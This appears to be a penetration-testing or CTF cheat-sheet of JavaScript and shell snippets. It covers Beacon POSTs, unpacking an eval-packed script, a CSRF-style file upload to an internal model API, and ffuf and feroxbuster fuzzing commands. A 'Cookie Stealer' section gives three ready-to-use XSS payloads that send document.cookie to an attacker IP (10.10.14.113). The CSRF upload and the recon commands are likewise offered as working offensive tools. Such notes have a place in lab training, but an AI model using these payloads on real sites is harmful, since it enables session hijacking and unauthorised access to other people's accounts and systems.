Web
Javascript
Fetch alternative for POST
https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon
// Queue a small POST through the Beacon API instead of fetch().
const url = 'https://example.com/log';
// A string body is transmitted as text/plain; the browser does not label this
// key=value layout as a URL-encoded form.
const data = 'type=text&title=test&text=letmein';

// sendBeacon() returns true once the browser has queued the payload, which is
// not a confirmation that the server received or accepted it.
const success = navigator.sendBeacon(url, data);
if (!success) {
  console.error('Failed to send data.');
} else {
  console.log('Data sent successfully.');
}
// Beacon POST with the fields packed into a FormData object, which the browser
// sends as multipart/form-data.
const url = 'https://example.com/log';
const formData = new FormData();
const fields = [
  ['type', 'text'],
  ['title', 'test'],
  ['text', 'letmein'],
];
for (const [name, value] of fields) {
  formData.append(name, value);
}

// true only means the browser accepted the payload for delivery; the response
// from the server is never exposed to the page.
const success = navigator.sendBeacon(url, formData);
if (!success) {
  console.error('Failed to send data.');
} else {
  console.log('Data sent successfully.');
}
Get all functions
// Print every enumerable own property of `window` whose value is a function.
// The number shown is the property's position in Object.keys(window), not a
// running count of the functions found.
const globalNames = Object.keys(window);
for (let position = 0; position < globalNames.length; position += 1) {
  const name = globalNames[position];
  if (typeof window[name] !== 'function') {
    continue;
  }
  console.log(`${position}: ${name}`);
}
// Single-line form for pasting into the DevTools console: logs "index: name" for each function-valued key of window.
for (const [index, key] of Object.keys(window).entries()) { if (typeof window[key] === 'function') { console.log(`${index}: ${key}`); } }
Dump function code via console
> functionName.toString()
...code...
Example
Obfuscated code:
// Packed script: the inner function(p,a,c,k,e,d) rebuilds the real source by
// replacing each short alphanumeric token in the payload string with the word
// at that index in the '|'-separated list; the outer eval() then executes it.
// Unpacked, it defines verifyInviteCode(code) and makeInviteCode(), which POST
// through $.ajax to /api/v1/invite/verify and /api/v1/invite/how/to/generate.
// To read the unpacked source without running it, print the inner function's
// return value instead of handing it to eval().
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}',24,24,'response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify'.split('|'),0,{}))
Deobfuscated:
> makeInviteCode.toString()
`function makeInviteCode(){$.ajax({type:"POST",dataType:"json",url:'/api/v1/invite/how/to/generate',success:function(response){console.log(response)},error:function(response){console.log(response)}})}`
Get HTB Sherlock Questions
// Turn every paragraph under .markdown-section into a numbered "### Task N."
// entry and replace the current page with the resulting list.
// The paragraph text is written back as HTML without escaping, and
// document.write() on a loaded page discards the existing document.
var t = Array.from(
  document.querySelectorAll('.markdown-section p'),
  (paragraph, position) => `### Task ${position + 1}. ${paragraph.textContent}<br><br><br>`,
).join('');
document.write(t);
CSRF form to upload a gzip compressed base64 blob
/**
 * Gunzip a Blob with the streaming DecompressionStream API.
 *
 * No limit is placed on the decompressed size, so the result can be far
 * larger than the input blob.
 *
 * @param {Blob} blob - gzip-compressed data.
 * @returns {Promise<Blob>} the decompressed bytes as a new Blob.
 */
async function DecompressBlob(blob) {
  const inflated = blob.stream().pipeThrough(new DecompressionStream("gzip"));
  // Response is used only as a convenient way to drain the stream into a Blob.
  const collector = new Response(inflated);
  return await collector.blob();
}
/**
 * Read a File into memory and POST it as the multipart field "file" to
 * /api/internal/model on the current origin.
 *
 * fetch() resolves for any HTTP status, so the success message is logged even
 * when the server answers with an error status; the logged value is the
 * Response object, not a parsed body.
 *
 * @param {File} file - file whose bytes, MIME type and name are uploaded.
 */
function uploadFile(file) {
  const reader = new FileReader();

  reader.onload = (loadEvent) => {
    // Re-wrap the bytes that were read so the part keeps the file's MIME type.
    const part = new Blob([loadEvent.target.result], { type: file.type });
    const formData = new FormData();
    formData.append('file', part, file.name);

    // The custom header is sent as-is; its meaning is defined by the target
    // application and is not visible in this listing.
    const request = {
      method: 'POST',
      body: formData,
      headers: { "X-SPACE-NO-CSRF": "1" },
    };

    fetch('/api/internal/model', request)
      .then((response) => console.log('File uploaded successfully:', response))
      .catch((failure) => console.error('Error uploading file:', failure));
  };

  reader.readAsArrayBuffer(file);
}
// Rebuild a file from an inline base64 string: decode, gunzip, wrap in a File,
// then upload. Uses top-level await, so it runs in a module or the DevTools
// console. The base64 value below is a truncated placeholder.
const base64GzipString = "H4sICEOM....==";

// atob() yields one character per byte, so each char code is the byte value.
const decoded = atob(base64GzipString);
let bytes = new Uint8Array(decoded.length);
for (let i = 0; i < decoded.length; i += 1) {
  bytes[i] = decoded.charCodeAt(i);
}

let blob = new Blob([bytes], { type: "application/gzip" });
let data = await DecompressBlob(blob);

// Optional hex dump of the decompressed bytes for inspection (`dec` is
// presumably the decompressed blob, i.e. `data` in this listing):
// console.log(Array.from(new Uint8Array(await dec.arrayBuffer())).map(byte => byte.toString(16).padStart(2, '0')).join(' '));

// The File is named example.h5 but declared as text/plain.
const file = new File([data], "example.h5", { type: "text/plain" });
uploadFile(file);
Cookie Stealer
<!-- All three snippets append document.cookie to a URL on 10.10.14.113, so the cookie string leaves the page in the query string of a plain-HTTP GET request. -->
<!-- document.cookie does not include cookies set with the HttpOnly attribute, and a Content-Security-Policy whose img-src excludes the receiving host blocks the request. -->
<!-- Silent One-Liner -->
<!-- Creates an Image object in script and assigns the URL to its src; nothing is added to the DOM. -->
<script>var i=new Image;i.src="http://10.10.14.113/?"+document.cookie;</script>
<!-- <img> Tag Instead of <script> Tags -->
<!-- src=x fails to load, which fires onerror; the handler stays attached, so each later load failure fires it again. -->
<img src=x onerror=this.src='http://10.10.14.113/?'+document.cookie;>
<!-- <img> Tag and Without the Infinite Loop -->
<!-- Same handler, but it removes its own onerror attribute after the first run so a failed second load does not retrigger it. -->
<img src=x onerror="this.src='http://10.10.14.113/?'+document.cookie; this.removeAttribute('onerror');">
(VHost) Domain fuzzing
# HTTP
# Requests the same URL once per wordlist entry, with the Host header set to FUZZ.$domain (FUZZ is ffuf's wordlist placeholder).
# -mc all matches every status code; -fl drops responses with the given line count, so CHANGE_FOR_COMMON_LINE_NUMBER must be replaced with the line count of the response returned for an unknown host.
domain='domain.tld'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl CHANGE_FOR_COMMON_LINE_NUMBER
# HTTPs
# Same Host-header run over TLS, with -k added to the command line.
domain='domain.tld'; ffuf -k -u "https://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl CHANGE_FOR_COMMON_LINE_NUMBER
FeroxBuster
# HTTP
# Content discovery with the SecLists common.txt wordlist (-w).
# -n disables recursion, -D turns off automatic wildcard-response filtering,
# -C drops responses with status 404/403/400, -S drops responses of 0 or 34 bytes
# (presumably sizes seen on the target these notes were written for; confirm per target).
# --thorough switches on feroxbuster's extended collection preset; see `feroxbuster --help` for what it enables in the installed version.
# The command appears twice on the page; both lines are identical.
feroxbuster -u 'http://domain.tld/' -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
feroxbuster -u 'http://domain.tld/' -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
# HTTPs
# Same filters over TLS with the quickhits.txt wordlist; -k disables TLS certificate validation in the client.
feroxbuster -u 'https://domain.tld/' -k -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --thorough -n -D -C 404,403,400 -S 0,34
feroxbuster -u 'https://domain.tld/' -k -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --thorough -n -D -C 404,403,400 -S 0,34